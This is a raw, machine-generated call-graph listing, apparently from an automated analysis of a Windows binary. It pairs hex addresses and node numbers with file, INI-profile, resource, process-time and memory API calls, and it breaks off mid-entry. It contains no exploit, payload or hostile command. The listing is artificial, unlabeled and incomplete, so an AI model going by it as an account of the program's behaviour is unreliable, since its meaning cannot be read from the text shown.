39050 40b1ab ??3@YAXPAX ??3@YAXPAX 39025->39050 39026 403a3f memset 39031 403a2f 39026->39031 39028 403aef 39028->38423 39029 40a8d0 7 API calls 39029->39031 39030 409d1f 6 API calls 39030->39031 39031->39025 39031->39026 39031->39029 39031->39030 39032 409b98 GetFileAttributesW 39031->39032 39032->39031 39034 40a051 GetFileTime CloseHandle 39033->39034 39035 4039ca CompareFileTime 39033->39035 39034->39035 39035->38423 39036->38424 39038 414c2e 17 API calls 39037->39038 39039 403c38 39038->39039 39040 409719 2 API calls 39039->39040 39041 403c3f wcscat 39040->39041 39042 414c2e 17 API calls 39041->39042 39043 403c61 39042->39043 39044 409719 2 API calls 39043->39044 39045 403c68 wcscat 39044->39045 39051 403af5 39045->39051 39048 403af5 20 API calls 39049 403c95 39048->39049 39049->39031 39050->39028 39052 403b02 39051->39052 39053 40ae18 9 API calls 39052->39053 39061 403b37 39053->39061 39054 403bdb 39056 40aebe FindClose 39054->39056 39055 40add4 wcscmp wcscmp 39055->39061 39057 403be6 39056->39057 39057->39048 39058 40ae18 9 API calls 39058->39061 39059 40ae51 9 API calls 39059->39061 39060 40aebe FindClose 39060->39061 39061->39054 39061->39055 39061->39058 39061->39059 39061->39060 39062 40a8d0 7 API calls 39061->39062 39062->39061 39064 409d1f 6 API calls 39063->39064 39065 404190 39064->39065 39078 409b98 GetFileAttributesW 39065->39078 39067 40419c 39068 4041a7 6 API calls 39067->39068 39069 40435c 39067->39069 39071 40424f 39068->39071 39069->38450 39071->39069 39072 40425e memset 39071->39072 39074 409d1f 6 API calls 39071->39074 39075 40a8ab 9 API calls 39071->39075 39079 414842 39071->39079 39072->39071 39073 404296 wcscpy 39072->39073 39073->39071 39074->39071 39076 4042b6 memset memset _snwprintf wcscpy 39075->39076 39076->39071 39077->38448 39078->39067 39082 41443e 39079->39082 39081 414866 39081->39071 39083 41444b 39082->39083 39084 414451 39083->39084 39085 4144a3 GetPrivateProfileStringW 39083->39085 39086 414491 39084->39086 39087 414455 wcschr 39084->39087 39085->39081 39089 414495 WritePrivateProfileStringW 39086->39089 39087->39086 39088 414463 _snwprintf 39087->39088 39088->39089 39089->39081 39090->38454 39092 40b2cc 27 API calls 39091->39092 39093 409615 39092->39093 39094 409d1f 6 API calls 39093->39094 39095 409625 39094->39095 39118 409b98 GetFileAttributesW 39095->39118 39097 409634 39098 409648 39097->39098 39135 4091b8 241 API calls 39097->39135 39100 40b2cc 27 API calls 39098->39100 39102 408801 39098->39102 39101 40965d 39100->39101 39103 409d1f 6 API calls 39101->39103 39102->38457 39102->38458 39104 40966d 39103->39104 39119 409b98 GetFileAttributesW 39104->39119 39106 40967c 39106->39102 39120 409529 39106->39120 39118->39097 39119->39106 39136 4096c3 CreateFileW 39120->39136 39122 409543 39123 409550 GetFileSize 39122->39123 39134 4095cd 39122->39134 39124 409577 CloseHandle 39123->39124 39125 40955f 39123->39125 39131 409585 39124->39131 39124->39134 39126 40afcf 2 API calls 39125->39126 39127 409569 39126->39127 39137 40a2ef ReadFile 39127->39137 39129 409574 39129->39124 39130 4095c3 39139 40908b 57 API calls 39130->39139 39131->39130 39131->39134 39138 408b8d 38 API calls 39131->39138 39134->39102 39135->39098 39136->39122 39137->39129 39138->39131 39139->39134 39167 413f4f 39140->39167 39143 413f37 K32GetModuleFileNameExW 39144 413f4a 39143->39144 39144->38518 39146 413969 wcscpy 39145->39146 39147 41396c wcschr 39145->39147 39158 413a3a 39146->39158 39147->39146 39149 41398e 39147->39149 39172 4097f7 wcslen wcslen _memicmp 39149->39172 39151 41399a 39152 4139a4 memset 39151->39152 39153 4139e6 39151->39153 39173 409dd5 GetWindowsDirectoryW wcscpy 39152->39173 39154 413a31 wcscpy 39153->39154 39155 4139ec memset 39153->39155 39154->39158 39174 409dd5 GetWindowsDirectoryW wcscpy 39155->39174 39158->38518 39159 4139c9 wcscpy wcscat 39159->39158 39160 413a11 memcpy wcscat 39160->39158 39162 413cb0 GetModuleHandleW 39161->39162 39163 413cda 39161->39163 39162->39163 39164 413cbf GetProcAddress 39162->39164 39165 413ce3 GetProcessTimes 39163->39165 39166 413cf6 39163->39166 39164->39163 39165->38520 39166->38520 39168 413f2f 39167->39168 39169 413f54 39167->39169 39168->39143 39168->39144 39170 40a804 8 API calls 39169->39170 39171 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39170->39171 39171->39168 39172->39151 39173->39159 39174->39160 39175->38541 39176->38563 39178 409cf9 GetVersionExW 39177->39178 39179 409d0a 39177->39179 39178->39179 39179->38570 39179->38575 39180->38577 39181->38580 39182->38582 39183->38627 39185 40bba5 39184->39185 39300 40cc26 39185->39300 39188 40bd4b 39321 40cc0c 39188->39321 39193 40b2cc 27 API calls 39194 40bbef 39193->39194 39328 40ccf0 _wcsicmp 39194->39328 39196 40bbf5 39196->39188 39329 40ccb4 6 API calls 39196->39329 39198 40bc26 39199 40cf04 17 API calls 39198->39199 39200 40bc2e 39199->39200 39201 40bd43 39200->39201 39202 40b2cc 27 API calls 39200->39202 39203 40cc0c 4 API calls 39201->39203 39204 40bc40 39202->39204 39203->39188 39330 40ccf0 _wcsicmp 39204->39330 39206 40bc46 39206->39201 39207 40bc61 memset memset WideCharToMultiByte 39206->39207 39331 40103c strlen 39207->39331 39209 40bcc0 39210 40b273 27 API calls 39209->39210 39211 40bcd0 memcmp 39210->39211 39211->39201 39212 40bce2 39211->39212 39213 404423 38 API calls 39212->39213 39214 40bd10 39213->39214 39214->39201 39215 40bd3a LocalFree 39214->39215 39216 40bd1f memcpy 39214->39216 39215->39201 39216->39215 39217->38642 39391 4438b5 39218->39391 39220 44444c 39226 40b879 39220->39226 39405 415a6d 39220->39405 39222 444486 39225 4444b9 memcpy 39222->39225 39263 4444a4 39222->39263 39224 44469e 39224->39226 39456 443d90 111 API calls 39224->39456 39409 415258 39225->39409 39226->38645 39226->38646 39229 444524 39230 444541 39229->39230 39231 44452a 39229->39231 39412 444316 39230->39412 39446 416935 16 API calls 39231->39446 39235 444316 18 API calls 39236 444563 39235->39236 39237 444316 18 API calls 39236->39237 39238 44456f 39237->39238 39239 444316 18 API calls 39238->39239 39240 44457f 39239->39240 39240->39263 39426 432d4e 39240->39426 39243 444316 18 API calls 39244 4445b0 39243->39244 39430 41eed2 39244->39430 39246 4445cf 39247 4445d6 39246->39247 39248 4445ee 39246->39248 39447 416935 16 API calls 39247->39447 39448 43302c memset 39248->39448 39251 4445fa 39449 43302c memset 39251->39449 39253 444609 39253->39263 39450 416935 16 API calls 39253->39450 39255 444646 39451 434d4b 17 API calls 39255->39451 39257 44464d 39452 437655 16 API calls 39257->39452 39259 444653 39453 4442e6 11 API calls 39259->39453 39261 44465d 39261->39263 39454 416935 16 API calls 39261->39454 39455 4442e6 11 API calls 39263->39455 39494 438460 39264->39494 39266 40b8a4 39266->38654 39270 4251c4 39266->39270 39268 409a74 GetTempFileNameW 39267->39268 39269 409a66 GetWindowsDirectoryW 39267->39269 39268->38640 39269->39268 39591 424f07 11 API calls 39270->39591 39272 4251e4 39273 4251f7 39272->39273 39274 4251e8 39272->39274 39593 4250f8 39273->39593 39592 4446ea 11 API calls 39274->39592 39276 4251f2 39276->38678 39278 425209 39281 425249 39278->39281 39284 4250f8 127 API calls 39278->39284 39285 425287 39278->39285 39601 4384e9 135 API calls 39278->39601 39602 424f74 124 API calls 39278->39602 39281->39285 39603 424ff0 13 API calls 39281->39603 39284->39278 39605 415c7d 16 API calls 39285->39605 39286 425266 39286->39285 39604 415be9 memcpy 39286->39604 39288->38678 39289->38678 39290->38678 39291->38678 39292->38678 39293->38678 39294->38678 39295->38678 39296->38678 39297->38654 39298->38645 39299->38675 39332 4096c3 CreateFileW 39300->39332 39302 40cc34 39303 40cc3d GetFileSize 39302->39303 39311 40bbca 39302->39311 39304 40afcf 2 API calls 39303->39304 39305 40cc64 39304->39305 39333 40a2ef ReadFile 39305->39333 39307 40cc71 39334 40ab4a MultiByteToWideChar 39307->39334 39309 40cc95 CloseHandle 39310 40b04b ??3@YAXPAX 39309->39310 39310->39311 39311->39188 39312 40cf04 39311->39312 39313 40b633 ??3@YAXPAX 39312->39313 39314 40cf14 39313->39314 39340 40b1ab ??3@YAXPAX ??3@YAXPAX 39314->39340 39316 40bbdd 39316->39188 39316->39193 39317 40cf1b 39317->39316 39319 40cfef 39317->39319 39341 40cd4b 39317->39341 39320 40cd4b 14 API calls 39319->39320 39320->39316 39322 40b633 ??3@YAXPAX 39321->39322 39323 40cc15 39322->39323 39324 40aa04 ??3@YAXPAX 39323->39324 39325 40cc1d 39324->39325 39390 40b1ab ??3@YAXPAX ??3@YAXPAX 39325->39390 39327 40b7d4 memset CreateFileW 39327->38634 39327->38635 39328->39196 39329->39198 39330->39206 39331->39209 39332->39302 39333->39307 39335 40ab93 39334->39335 39336 40ab6b 39334->39336 39335->39309 39337 40a9ce 4 API calls 39336->39337 39338 40ab74 39337->39338 39339 40ab7c MultiByteToWideChar 39338->39339 39339->39335 39340->39317 39342 40cd7b 39341->39342 39375 40aa29 39342->39375 39344 40cef5 39345 40aa04 ??3@YAXPAX 39344->39345 39346 40cefd 39345->39346 39346->39317 39348 40aa29 6 API calls 39349 40ce1d 39348->39349 39350 40aa29 6 API calls 39349->39350 39351 40ce3e 39350->39351 39352 40ce6a 39351->39352 39383 40abb7 wcslen memmove 39351->39383 39353 40ce9f 39352->39353 39386 40abb7 wcslen memmove 39352->39386 39355 40a8d0 7 API calls 39353->39355 39358 40ceb5 39355->39358 39356 40ce56 39384 40aa71 wcslen 39356->39384 39364 40a8d0 7 API calls 39358->39364 39360 40ce8b 39387 40aa71 wcslen 39360->39387 39361 40ce5e 39385 40abb7 wcslen memmove 39361->39385 39366 40cecb 39364->39366 39365 40ce93 39388 40abb7 wcslen memmove 39365->39388 39389 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39366->39389 39369 40cedd 39370 40aa04 ??3@YAXPAX 39369->39370 39371 40cee5 39370->39371 39372 40aa04 ??3@YAXPAX 39371->39372 39373 40ceed 39372->39373 39374 40aa04 ??3@YAXPAX 39373->39374 39374->39344 39376 40aa33 39375->39376 39377 40aa63 39375->39377 39378 40aa44 39376->39378 39379 40aa38 wcslen 39376->39379 39377->39344 39377->39348 39380 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39378->39380 39379->39378 39381 40aa4d 39380->39381 39381->39377 39382 40aa51 memcpy 39381->39382 39382->39377 39383->39356 39384->39361 39385->39352 39386->39360 39387->39365 39388->39353 39389->39369 39390->39327 39392 4438d0 39391->39392 39402 4438c9 39391->39402 39457 415378 memcpy memcpy 39392->39457 39402->39220 39406 415a77 39405->39406 39407 415a8d 39406->39407 39408 415a7e memset 39406->39408 39407->39222 39408->39407 39410 4438b5 11 API calls 39409->39410 39411 41525d 39410->39411 39411->39229 39413 444328 39412->39413 39414 444423 39413->39414 39415 44434e 39413->39415 39460 4446ea 11 API calls 39414->39460 39417 432d4e 3 API calls 39415->39417 39418 44435a 39417->39418 39420 444375 39418->39420 39425 44438b 39418->39425 39419 432d4e 3 API calls 39421 4443ec 39419->39421 39458 416935 16 API calls 39420->39458 39423 444381 39421->39423 39459 416935 16 API calls 39421->39459 39423->39235 39425->39419 39427 432d65 39426->39427 39428 432d58 39426->39428 39427->39243 39461 432cc4 memset memset memcpy 39428->39461 39431 41eee2 39430->39431 39432 415a6d memset 39431->39432 39433 41ef23 39432->39433 39434 415a6d memset 39433->39434 39438 41ef2d 39433->39438 39435 41ef42 39434->39435 39439 41ef49 39435->39439 39462 41b7d9 39435->39462 39437 41ef66 39437->39439 39440 41ef74 memset 39437->39440 39438->39246 39439->39438 39480 41b321 101 API calls 39439->39480 39442 41ef91 39440->39442 39444 41ef9e 39440->39444 39476 41519d 39442->39476 39444->39439 39479 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39444->39479 39446->39263 39447->39263 39448->39251 39449->39253 39450->39255 39451->39257 39452->39259 39453->39261 39454->39263 39455->39224 39456->39226 39458->39423 39459->39423 39460->39423 39461->39427 39463 41b812 39462->39463 39471 41b884 39463->39471 39474 41b849 39463->39474 39481 444706 11 API calls 39463->39481 39464 415a6d memset 39465 41b8c2 39464->39465 39466 41b980 39465->39466 39467 41b902 memcpy memcpy memcpy memcpy memcpy 39465->39467 39465->39474 39473 41b9ad 39466->39473 39482 4151e3 39466->39482 39467->39466 39470 41ba12 39472 41ba32 memset 39470->39472 39470->39474 39471->39464 39471->39474 39472->39474 39473->39474 39485 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39473->39485 39474->39437 39486 4175ed 39476->39486 39479->39439 39480->39438 39481->39471 39484 41837f 55 API calls 39482->39484 39483 4151f9 39483->39473 39484->39483 39485->39470 39487 417570 SetFilePointer GetLastError GetLastError 39486->39487 39488 4175ff 39487->39488 39489 41760a ReadFile 39488->39489 39492 4151b3 39488->39492 39490 417637 39489->39490 39491 417627 GetLastError 39489->39491 39490->39492 39493 41763e memset 39490->39493 39491->39492 39492->39444 39493->39492 39506 41703f 39494->39506 39496 43847a 39497 43848a 39496->39497 39498 43847e 39496->39498 39513 438270 39497->39513 39543 4446ea 11 API calls 39498->39543 39502 438488 39502->39266 39504 4384bb 39505 438270 134 API calls 39504->39505 39505->39502 39507 417044 39506->39507 39508 41705c 39506->39508 39512 417055 39507->39512 39545 416760 11 API calls 39507->39545 39509 417075 39508->39509 39546 41707a 11 API calls 39508->39546 39509->39496 39512->39496 39547 415a91 39513->39547 39515 43828d 39516 438297 39515->39516 39517 438341 39515->39517 39519 4382d6 39515->39519 39590 415c7d 16 API calls 39516->39590 39551 44358f 39517->39551 39522 4382fb 39519->39522 39523 4382db 39519->39523 39521 438458 39521->39502 39544 424f26 123 API calls 39521->39544 39584 415c23 memcpy 39522->39584 39582 416935 16 API calls 39523->39582 39526 438305 39530 44358f 19 API calls 39526->39530 39532 438318 39526->39532 39527 4382e9 39583 415c7d 16 API calls 39527->39583 39529 438373 39535 438383 39529->39535 39585 4300e8 memset memset memcpy 39529->39585 39530->39532 39532->39529 39577 43819e 39532->39577 39534 4383cd 39536 4383f5 39534->39536 39587 42453e 123 API calls 39534->39587 39535->39534 39586 415c23 memcpy 39535->39586 39539 438404 39536->39539 39540 43841c 39536->39540 39588 416935 16 API calls 39539->39588 39589 416935 16 API calls 39540->39589 39543->39502 39544->39504 39545->39512 39546->39507 39548 415a9d 39547->39548 39549 415ab3 39548->39549 39550 415aa4 memset 39548->39550 39549->39515 39550->39549 39553 4435be 39551->39553 39552 443676 39554 443758 39552->39554 39556 442ff8 19 API calls 39552->39556 39559 443737 39552->39559 39553->39552 39558 442ff8 19 API calls 39553->39558 39560 4436ce 39553->39560 39561 44366c 39553->39561 39575 44360c 39553->39575 39555 441409 memset 39554->39555 39567 443775 39554->39567 39555->39554 39556->39559 39557 442ff8 19 API calls 39557->39554 39558->39553 39559->39557 39563 4165ff 11 API calls 39560->39563 39564 4169a7 11 API calls 39561->39564 39562 4437be 39565 416760 11 API calls 39562->39565 39566 4437de 39562->39566 39563->39552 39564->39552 39565->39566 39568 42463b memset memcpy 39566->39568 39570 443801 39566->39570 39567->39562 39571 415c56 11 API calls 39567->39571 39568->39570 39569 443826 39572 43bd08 memset 39569->39572 39570->39569 39573 43024d memset 39570->39573 39571->39562 39574 443837 39572->39574 39573->39569 39574->39575 39576 43024d memset 39574->39576 39575->39532 39576->39574 39578 438246 39577->39578 39580 4381ba 39577->39580 39578->39529 39579 41f432 110 API calls 39579->39580 39580->39578 39580->39579 39581 41f638 104 API calls 39580->39581 39581->39580 39582->39527 39583->39516 39584->39526 39585->39535 39586->39534 39587->39536 39588->39516 39589->39516 39590->39521 39591->39272 39592->39276 39594 425108 39593->39594 39600 42510d 39593->39600 39638 424f74 124 API calls 39594->39638 39597 42516e 39639 415c7d 16 API calls 39597->39639 39598 425115 39598->39278 39600->39598 39606 42569b 39600->39606 39601->39278 39602->39278 39603->39286 39604->39285 39605->39276 39607 4256f1 39606->39607 39634 4259c2 39606->39634 39613 4259da 39607->39613 39617 422aeb memset memcpy memcpy 39607->39617 39618 429a4d 39607->39618 39623 4260a1 39607->39623 39632 429ac1 39607->39632 39607->39634 39637 425a38 39607->39637 39640 4227f0 memset memcpy 39607->39640 39641 422b84 15 API calls 39607->39641 39642 422b5d memset memcpy memcpy 39607->39642 39643 422640 13 API calls 39607->39643 39645 4241fc 11 API calls 39607->39645 39646 42413a 90 API calls 39607->39646 39612 4260dd 39651 424251 120 API calls 39612->39651 39650 416760 11 API calls 39613->39650 39617->39607 39619 429a66 39618->39619 39620 429a9b 39618->39620 39652 415c56 11 API calls 39619->39652 39624 429a96 39620->39624 39654 416760 11 API calls 39620->39654 39649 415c56 11 API calls 39623->39649 39655 424251 120 API calls 39624->39655 39626 429a7a 39653 416760 11 API calls 39626->39653 39633 425ad6 39632->39633 39656 415c56 11 API calls 39632->39656 39633->39597 39634->39633 39644 415c56 11 API calls 39634->39644 39637->39634 39647 422640 13 API calls 39637->39647 39648 4226e0 12 API calls 39637->39648 39638->39600 39639->39598 39640->39607 39641->39607 39642->39607 39643->39607 39644->39613 39645->39607 39646->39607 39647->39637 39648->39637 39649->39613 39650->39612 39651->39633 39652->39626 39653->39624 39654->39624 39655->39632 39656->39613 39657->38715 39658->38722 39659 44dea5 39660 44deb5 FreeLibrary 39659->39660 39661 44dec3 39659->39661 39660->39661 39662 4147f3 39665 414561 39662->39665 39664 414813 39666 41456d 39665->39666 39667 41457f GetPrivateProfileIntW 39665->39667 39670 4143f1 memset _itow WritePrivateProfileStringW 39666->39670 39667->39664 39669 41457a 39669->39664 39670->39669 39671 44def7 39672 44df07 39671->39672 39673 44df00 ??3@YAXPAX 39671->39673 39674 44df17 39672->39674 39675 44df10 ??3@YAXPAX 39672->39675 39673->39672 39676 44df27 39674->39676 39677 44df20 ??3@YAXPAX 39674->39677 39675->39674 39678 44df37 39676->39678 39679 44df30 ??3@YAXPAX 39676->39679 39677->39676 39679->39678 39680 4287c1 39681 4287d2 39680->39681 39682 429ac1 39680->39682 39683 428818 39681->39683 39684 42881f 39681->39684 39698 425711 39681->39698 39694 425ad6 39682->39694 39750 415c56 11 API calls 39682->39750 39717 42013a 39683->39717 39745 420244 97 API calls 39684->39745 39689 4260dd 39744 424251 120 API calls 39689->39744 39691 4259da 39743 416760 11 API calls 39691->39743 39697 429a4d 39699 429a66 39697->39699 39704 429a9b 39697->39704 39698->39682 39698->39691 39698->39697 39700 422aeb memset memcpy memcpy 39698->39700 39703 4260a1 39698->39703 39713 4259c2 39698->39713 39716 425a38 39698->39716 39733 4227f0 memset memcpy 39698->39733 39734 422b84 15 API calls 39698->39734 39735 422b5d memset memcpy memcpy 39698->39735 39736 422640 13 API calls 39698->39736 39738 4241fc 11 API calls 39698->39738 39739 42413a 90 API calls 39698->39739 39746 415c56 11 API calls 39699->39746 39700->39698 39742 415c56 11 API calls 39703->39742 39705 429a96 39704->39705 39748 416760 11 API calls 39704->39748 39749 424251 120 API calls 39705->39749 39707 429a7a 39747 416760 11 API calls 39707->39747 39713->39694 39737 415c56 11 API calls 39713->39737 39716->39713 39740 422640 13 API calls 39716->39740 39741 4226e0 12 API calls 39716->39741 39718 42014c 39717->39718 39721 420151 39717->39721 39760 41e466 97 API calls 39718->39760 39720 420162 39720->39698 39721->39720 39722 4201b3 39721->39722 39723 420229 39721->39723 39724 4201b8 39722->39724 39725 4201dc 39722->39725 39723->39720 39726 41fd5e 86 API calls 39723->39726 39751 41fbdb 39724->39751 39725->39720 39729 4201ff 39725->39729 39757 41fc4c 39725->39757 39726->39720 39729->39720 39732 42013a 97 API calls 39729->39732 39732->39720 39733->39698 39734->39698 39735->39698 39736->39698 39737->39691 39738->39698 39739->39698 39740->39716 39741->39716 39742->39691 39743->39689 39744->39694 39745->39698 39746->39707 39747->39705 39748->39705 39749->39682 39750->39691 39752 41fbf1 39751->39752 39753 41fbf8 39751->39753 39756 41fc39 39752->39756 39775 4446ce 11 API calls 39752->39775 39765 41ee26 39753->39765 39756->39720 39761 41fd5e 39756->39761 39758 41ee6b 86 API calls 39757->39758 39759 41fc5d 39758->39759 39759->39725 39760->39721 39762 41fd65 39761->39762 39763 41fdab 39762->39763 39764 41fbdb 86 API calls 39762->39764 39763->39720 39764->39762 39766 41ee41 39765->39766 39767 41ee32 39765->39767 39776 41edad 39766->39776 39779 4446ce 11 API calls 39767->39779 39771 41ee3c 39771->39752 39773 41ee58 39773->39771 39781 41ee6b 39773->39781 39775->39756 39785 41be52 39776->39785 39779->39771 39780 41eb85 11 API calls 39780->39773 39782 41ee70 39781->39782 39783 41ee78 39781->39783 39826 41bf99 86 API calls 39782->39826 39783->39771 39786 41be6f 39785->39786 39787 41be5f 39785->39787 39791 41be8c 39786->39791 39806 418c63 39786->39806 39820 4446ce 11 API calls 39787->39820 39789 41be69 39789->39771 39789->39780 39791->39789 39792 41bf3a 39791->39792 39794 41bed1 39791->39794 39804 41bee7 39791->39804 39823 4446ce 11 API calls 39792->39823 39796 41bef0 39794->39796 39797 41bee2 39794->39797 39799 41bf01 39796->39799 39796->39804 39810 41ac13 39797->39810 39798 41bf24 memset 39798->39789 39799->39798 39801 41bf14 39799->39801 39821 418a6d memset memcpy memset 39799->39821 39822 41a223 memset memcpy memset 39801->39822 39804->39789 39824 41a453 86 API calls 39804->39824 39805 41bf20 39805->39798 39809 418c72 39806->39809 39807 418c94 39807->39791 39808 418d51 memset memset 39808->39807 39809->39807 39809->39808 39811 41ac3f memset 39810->39811 39813 41ac52 39810->39813 39812 41acd9 39811->39812 39812->39804 39815 41ac6a 39813->39815 39825 41dc14 19 API calls 39813->39825 39816 41aca1 39815->39816 39817 41519d 6 API calls 39815->39817 39816->39812 39818 41acc0 memset 39816->39818 39819 41accd memcpy 39816->39819 39817->39816 39818->39812 39819->39812 39820->39789 39821->39801 39822->39805 39823->39804 39825->39815 39826->39783 39827 417bc5 39828 417c61 39827->39828 39829 417bda 39827->39829 39829->39828 39830 417bf6 UnmapViewOfFile CloseHandle 39829->39830 39832 417c2c 39829->39832 39834 4175b7 39829->39834 39830->39829 39830->39830 39832->39829 39839 41851e 20 API calls 39832->39839 39835 4175d6 CloseHandle 39834->39835 39836 4175c8 39835->39836 39837 4175df 39835->39837 39836->39837 39838 4175ce Sleep 39836->39838 39837->39829 39838->39835 39839->39832 39840 4152c6 malloc 39841 4152e2 39840->39841 39842 4152ef 39840->39842 39844 416760 11 API calls 39842->39844 39844->39841 39845 4148b6 FindResourceW 39846 4148cf SizeofResource 39845->39846 39849 4148f9 39845->39849 39847 4148e0 LoadResource 39846->39847 39846->39849 39848 4148ee LockResource 39847->39848 39847->39849 39848->39849 39850 441b3f 39860 43a9f6 39850->39860 39852 441b61 40033 4386af memset 39852->40033 39854 44189a 39855 442bd4 39854->39855 39856 4418e2 39854->39856 39857 4418ea 39855->39857 40035 441409 memset 39855->40035 39856->39857 40034 4414a9 12 API calls 39856->40034 39861 43aa20 39860->39861 39862 43aadf 39860->39862 39861->39862 39863 43aa34 memset 39861->39863 39862->39852 39864 43aa56 39863->39864 39865 43aa4d 39863->39865 40036 43a6e7 39864->40036 40044 42c02e memset 39865->40044 39870 43aad3 40046 4169a7 11 API calls 39870->40046 39871 43aaae 39871->39862 39871->39870 39886 43aae5 39871->39886 39872 43ac18 39875 43ac47 39872->39875 40048 42bbd5 memcpy memcpy memcpy memset memcpy 39872->40048 39876 43aca8 39875->39876 40049 438eed 16 API calls 39875->40049 39879 43acd5 39876->39879 40051 4233ae 11 API calls 39876->40051 40052 423426 11 API calls 39879->40052 39880 43ac87 40050 4233c5 16 API calls 39880->40050 39884 43ace1 40053 439811 163 API calls 39884->40053 39885 43a9f6 161 API calls 39885->39886 39886->39862 39886->39872 39886->39885 40047 439bbb 22 API calls 39886->40047 39888 43acfd 39894 43ad2c 39888->39894 40054 438eed 16 API calls 39888->40054 39890 43ad19 40055 4233c5 16 API calls 39890->40055 39891 43ad58 40056 44081d 163 API calls 39891->40056 39894->39891 39897 43add9 39894->39897 39896 43ae3a memset 39898 43ae73 39896->39898 39897->39897 40060 423426 11 API calls 39897->40060 40061 42e1c0 147 API calls 39898->40061 39899 43adab 40058 438c4e 163 API calls 39899->40058 39902 43ad6c 39902->39862 39902->39899 40057 42370b memset memcpy memset 39902->40057 39903 43adcc 40059 440f84 12 API calls 39903->40059 39904 43ae96 40062 42e1c0 147 API calls 39904->40062 39908 43aea8 39909 43aec1 39908->39909 40063 42e199 147 API calls 39908->40063 39911 43af00 39909->39911 40064 42e1c0 147 API calls 39909->40064 39911->39862 39914 43af1a 39911->39914 39915 43b3d9 39911->39915 40065 438eed 16 API calls 39914->40065 39920 43b3f6 39915->39920 39924 43b4c8 39915->39924 39917 43b60f 39917->39862 40124 4393a5 17 API calls 39917->40124 39918 43af2f 40066 4233c5 16 API calls 39918->40066 40106 432878 12 API calls 39920->40106 39922 43af51 40067 423426 11 API calls 39922->40067 39930 43b4f2 39924->39930 40112 42bbd5 memcpy memcpy memcpy memset memcpy 39924->40112 39926 43af7d 40068 423426 11 API calls 39926->40068 40113 43a76c 21 API calls 39930->40113 39931 43b529 40114 44081d 163 API calls 39931->40114 39932 43b462 40108 423330 11 API calls 39932->40108 39933 43af94 40069 423330 11 API calls 39933->40069 39937 43b47e 39941 43b497 39937->39941 40109 42374a memcpy memset memcpy memcpy memcpy 39937->40109 39938 43b544 39942 43b55c 39938->39942 40115 42c02e memset 39938->40115 39939 43b428 39939->39932 40107 432b60 16 API calls 39939->40107 39940 43afca 40070 423330 11 API calls 39940->40070 40110 4233ae 11 API calls 39941->40110 40116 43a87a 163 API calls 39942->40116 39948 43afdb 40071 4233ae 11 API calls 39948->40071 39950 43b56c 39953 43b58a 39950->39953 40117 423330 11 API calls 39950->40117 39951 43b4b1 40111 423399 11 API calls 39951->40111 39952 43afee 40072 44081d 163 API calls 39952->40072 40118 440f84 12 API calls 39953->40118 39958 43b4c1 40120 42db80 163 API calls 39958->40120 39960 43b592 40119 43a82f 16 API calls 39960->40119 39963 43b5b4 40121 438c4e 163 API calls 39963->40121 39965 43b5cf 40122 42c02e memset 39965->40122 39967 43b1ef 40083 4233c5 16 API calls 39967->40083 39968 43b005 39968->39862 39971 43b01f 39968->39971 40073 42d836 163 API calls 39968->40073 39971->39967 40081 423330 11 API calls 39971->40081 40082 42d71d 163 API calls 39971->40082 39972 43b212 40084 423330 11 API calls 39972->40084 39973 43b087 40074 4233ae 11 API calls 39973->40074 39975 43add4 39975->39917 40123 438f86 16 API calls 39975->40123 39979 43b22a 40085 42ccb5 11 API calls 39979->40085 39981 43b10f 40077 423330 11 API calls 39981->40077 39982 43b23f 40086 4233ae 11 API calls 39982->40086 39984 43b257 40087 4233ae 11 API calls 39984->40087 39988 43b129 40078 4233ae 11 API calls 39988->40078 39989 43b26e 40088 4233ae 11 API calls 39989->40088 39992 43b09a 39992->39981 40075 42cc15 19 API calls 39992->40075 40076 4233ae 11 API calls 39992->40076 39993 43b282 40089 43a87a 163 API calls 39993->40089 39995 43b13c 40079 440f84 12 API calls 39995->40079 39997 43b29d 40090 423330 11 API calls 39997->40090 40000 43b15f 40080 4233ae 11 API calls 40000->40080 40001 43b2af 40003 43b2b8 40001->40003 40004 43b2ce 40001->40004 40091 4233ae 11 API calls 40003->40091 40092 440f84 12 API calls 40004->40092 40007 43b2da 40093 42370b memset memcpy memset 40007->40093 40008 43b2c9 40094 4233ae 11 API calls 40008->40094 40011 43b2f9 40095 423330 11 API calls 40011->40095 40013 43b30b 40096 423330 11 API calls 40013->40096 40015 43b325 40097 423399 11 API calls 40015->40097 40017 43b332 40098 4233ae 11 API calls 40017->40098 40019 43b354 40099 423399 11 API calls 40019->40099 40021 43b364 40100 43a82f 16 API calls 40021->40100 40023 43b370 40101 42db80 163 API calls 40023->40101 40025 43b380 40102 438c4e 163 API calls 40025->40102 40027 43b39e 40103 423399 11 API calls 40027->40103 40029 43b3ae 40104 43a76c 21 API calls 40029->40104 40031 43b3c3 40105 423399 11 API calls 40031->40105 40033->39854 40034->39857 40035->39855 40037 43a6f5 40036->40037 40038 43a765 40036->40038 40037->40038 40125 42a115 40037->40125 40038->39862 40045 4397fd memset 40038->40045 40042 43a73d 40042->40038 40043 42a115 147 API calls 40042->40043 40043->40038 40044->39864 40045->39871 40046->39862 40047->39886 40048->39875 40049->39880 40050->39876 40051->39879 40052->39884 40053->39888 40054->39890 40055->39894 40056->39902 40057->39899 40058->39903 40059->39975 40060->39896 40061->39904 40062->39908 40063->39909 40064->39909 40065->39918 40066->39922 40067->39926 40068->39933 40069->39940 40070->39948 40071->39952 40072->39968 40073->39973 40074->39992 40075->39992 40076->39992 40077->39988 40078->39995 40079->40000 40080->39971 40081->39971 40082->39971 40083->39972 40084->39979 40085->39982 40086->39984 40087->39989 40088->39993 40089->39997 40090->40001 40091->40008 40092->40007 40093->40008 40094->40011 40095->40013 40096->40015 40097->40017 40098->40019 40099->40021 40100->40023 40101->40025 40102->40027 40103->40029 40104->40031 40105->39975 40106->39939 40107->39932 40108->39937 40109->39941 40110->39951 40111->39958 40112->39930 40113->39931 40114->39938 40115->39942 40116->39950 40117->39953 40118->39960 40119->39958 40120->39963 40121->39965 40122->39975 40123->39917 40124->39862 40126 42a175 40125->40126 40128 42a122 40125->40128 40126->40038 40131 42b13b 147 API calls 40126->40131 40128->40126 40129 42a115 147 API calls 40128->40129 40132 43a174 40128->40132 40156 42a0a8 147 API calls 40128->40156 40129->40128 40131->40042 40146 43a196 40132->40146 40147 43a19e 40132->40147 40133 43a306 40133->40146 40170 4388c4 14 API calls 40133->40170 40136 